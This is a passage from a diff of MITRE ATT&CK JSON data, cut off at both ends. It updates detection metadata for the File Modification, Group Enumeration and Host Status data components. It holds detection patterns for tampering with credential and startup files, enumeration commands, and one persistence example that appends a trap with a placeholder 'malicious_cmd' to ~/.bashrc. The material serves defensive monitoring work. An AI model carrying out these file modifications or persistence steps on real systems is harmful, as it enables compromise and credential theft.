+                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File modification in /etc/paths.d or user shell rc files"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=2"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Enumeration of root certificates showing unexpected additions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write of .service unit files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write/unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or desktopservices modified settings or files"
+                        },
+                        {
+                            "name": "ESXiLogs:messages",
+                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "/etc/passwd or /etc/group file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SecurityAgentPlugins modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "boot"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "macos:auth",
+                            "channel": "~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "compute.instances.setMetadata"
+                        },
+                        {
+                            "name": "azure:resource",
+                            "channel": "PATCH vm/authorized_keys"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "file write or edit"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "rename"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "file_write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "replace existing dylibs"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
+                        },
+                        {
+                            "name": "firmware:update",
+                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
+                        },
+                        {
+                            "name": "IntegrityCheck:ImageValidation",
+                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "File modifications in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /etc/pam.d/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications to Mail.app plist files controlling message rules"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write: Modification of structured stored data by suspicious processes"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected log entries or malformed SQL operations in databases"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected creation or modification of stored data files in protected directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat, write, rename, unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "rename .vmdk to .*.locked|datastore write spike"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modified application plist or binary replacement in /Applications"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "admin command usage"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "startup-config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or overwrite in common web-hosting folders"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
+                        },
+                        {
+                            "name": "fs:plist",
+                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of existing .service file"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
+                        },
+                        {
+                            "name": "networkconfig",
+                            "channel": "unexpected OS image file upload or modification events"
+                        },
+                        {
+                            "name": "network:runtime",
+                            "channel": "checksum or runtime memory verification failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "rename,chmod"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "create/write/rename under user-writable paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of crontab or local.sh entries"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration file modified or replaced on network device"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Plist modifications containing virtualization run configurations"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/at and job execution path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "binary modified or replaced"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "binary or module replacement event"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
+                        },
+                        {
+                            "name": "networkdevice:firmware",
+                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, write, create, open"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File writes to application binaries or libraries at runtime"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write operations in /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_modify"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "modification of existing LaunchAgents plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib in monitored directories"
+                        },
+                        {
+                            "name": "WinEventLog:CodeIntegrity",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write operation on /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
+                        },
+                        {
+                            "name": "networkdevice:audit",
+                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount or losetup commands creating hidden or encrypted FS"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Hidden volume attachment or modification events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious plist edits for volume mounting behavior"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file writes"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "OfficeTelemetry or DLP"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Access Logging"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Anomalous editing of invoice or payment document templates"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "truncate, unlink, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
+                        },
+                        {
+                            "name": "linux:fim",
+                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
+                        },
+                        {
+                            "name": "sysdig:file",
+                            "channel": "evt.type=write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "rule definitions written to emond rule plists"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
+                        },
+                        {
+                            "name": "FileIntegrity:ImageValidation",
+                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write to launchd plist paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of entrypoint scripts or init containers"
+                        },
+                        {
+                            "name": "fs:plist_monitoring",
+                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting web directory files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Terminal/Editor processes modifying web folder"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "AndroidLogs:FileSystem",
+                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-16 16:41:53.549000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.275000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0099",
+                            "external_id": "DC0099"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Group Enumeration",
+                    "description": "Extracting group lists from identity systems identifies permissions, roles, or configurations. Adversaries may exploit high-privilege groups or misconfigurations. Examples:\n\n- AWS CLI: `aws iam list-groups`\n- PowerShell: `Get-ADGroup -Filter *`\n- (Saas) Google Workspace: Admin SDK Directory API\n- Azure: `Get-AzureADGroup`\n- Microsoft 365:  Graph API `GET https://graph.microsoft.com/v1.0/groups`\n\n*Data Collection Measures:*\n\n- Cloud Logging: Enable AWS CloudTrail, Azure Activity Logs, and Google Workspace Admin Logs for group-related actions.\n- Directory Monitoring: Track logs like AD Event ID 4662 (object operations).\n- API Monitoring: Log API activity like AWS IAM queries.\n- SaaS Monitoring: Use platform logs (e.g., Office 365 Unified Audit Logs).\n- SIEM Integration: Centralize group query tracking.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ListGroups, ListAttachedRolePolicies"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "az ad user get-member-groups, Get-AzRoleAssignment"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "cloudidentity.groups.list"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "GET /services/data/vXX.X/groups"
+                        },
+                        {
+                            "name": "saas:github",
+                            "channel": "GET /orgs/:org/teams, GET /teams/:team/members"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4798, 4799"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-03-13 22:21:38.311000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0099\", \"old_value\": \"https://attack.mitre.org/data-components/DC0099\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0018",
+                            "external_id": "DC0018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Host Status",
+                    "description": "Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.\n\n*Data Collection Measures:*\n\n- Windows Event Logs:\n    - Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.\n    - Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.\n    - Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.\n    - Event ID 12 (Windows Defender Status Change) \u2013 Detects changes in Windows Defender state.\n- Linux/macOS Monitoring:\n    - `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`\n    - Journald (journalctl) for kernel and system alerts.\n- Endpoint Detection and Response (EDR) Tools:\n    - Monitor agent health status, detect sensor tampering, and alert on missing telemetry.\n- Mobile Threat Intelligence Logs:\n    - Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
+                        },
+                        {
+                            "name": "android:appops",
+                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
+                        },
+                        {
+                            "name": "AndroidAttestation:SafetyNet",
+                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
+                        },
+                        {
+                            "name": "AndroidAttestation:VerifiedBoot",
+                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
+                        },
+                        {
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
+                        },
+                        {
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "firmware_update, kexec_load"
+                        },
+                        {
+                            "name": "AWS:CloudMetrics",
+                            "channel": "Autoscaling, memory/cpu alarms, or instance unhealthiness"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sustained spike in CPU usage on EC2 instance with web service role"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "StatusCheckFailed or StatusCheckFailed_System for burstable instances (t2/t3)"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sustained EC2 CPU usage above normal baseline"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "NetworkOut spike beyond baseline"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sudden spike in network output without a corresponding inbound request ratio"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Unusual CPU burst or metric anomalies"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Powering off or restarting host"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
+                        },
+                        {
+                            "name": "journald:boot",
+                            "channel": "Secure Boot failure, firmware version change"
+                        },
+                        {
+                            "name": "kubernetes:events",
+                            "channel": "CrashLoopBackOff, OOMKilled, container restart count exceeds threshold"
+                        },
+                        {
+                            "name": "linux:procfs",
+                            "channel": "Sustained high /proc/[pid]/stat usage"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Out of memory killer invoked or kernel panic entries"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Service stop or disable messages for security tools not reflected in SIEM alerts"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "system is powering down"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "interface_details "
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "Hardware UUID or device list drift"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Web service process (e.g., httpd) entering crash loop or consuming excessive CPU"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Spike in CPU or memory use from non-user-initiated processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Termination or disabling of XProtect, Gatekeeper, or third-party AV daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network stack resource exhaustion, tcp_accept queue overflow, repeated resets"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "EFI firmware integrity check failed"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System Integrity Protection (SIP) state reported as disabled"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System shutdown or reboot requested"
+                        },
+                        {
+                            "name": "MDM:DeviceIntegrity",
+                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "System reboot scheduled or performed"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP: possible SYN flood or backlog limit exceeded"
+                        },
+                        {
+                            "name": "OEMAttestation:Knox",
+                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
+                        },
+                        {
+                            "name": "prometheus:metrics",
+                            "channel": "Container CPU/Memory usage exceeding threshold"
+                        },
+                        {
+                            "name": "sar:network",
+                            "channel": "Outbound network saturation with minimal process activity"
+                        },
+                        {
+                            "name": "Sensor Health",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sustained CPU/memory exhaustion by service process (e.g., w3wp.exe)"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "High sustained CPU usage by a single process"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sudden spike in outbound throughput without corresponding inbound traffic"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sudden spikes in CPU/Memory usage linked to specific application processes"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-TCPIP",
+                            "channel": "Connection queue overflow or failure to allocate TCP state object"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1166, 7045"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1074"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=6006"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=16"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "System shutdowns due to bugcheck (Event ID 1001) or watchdog timer expirations"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-20 18:17:23.974000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
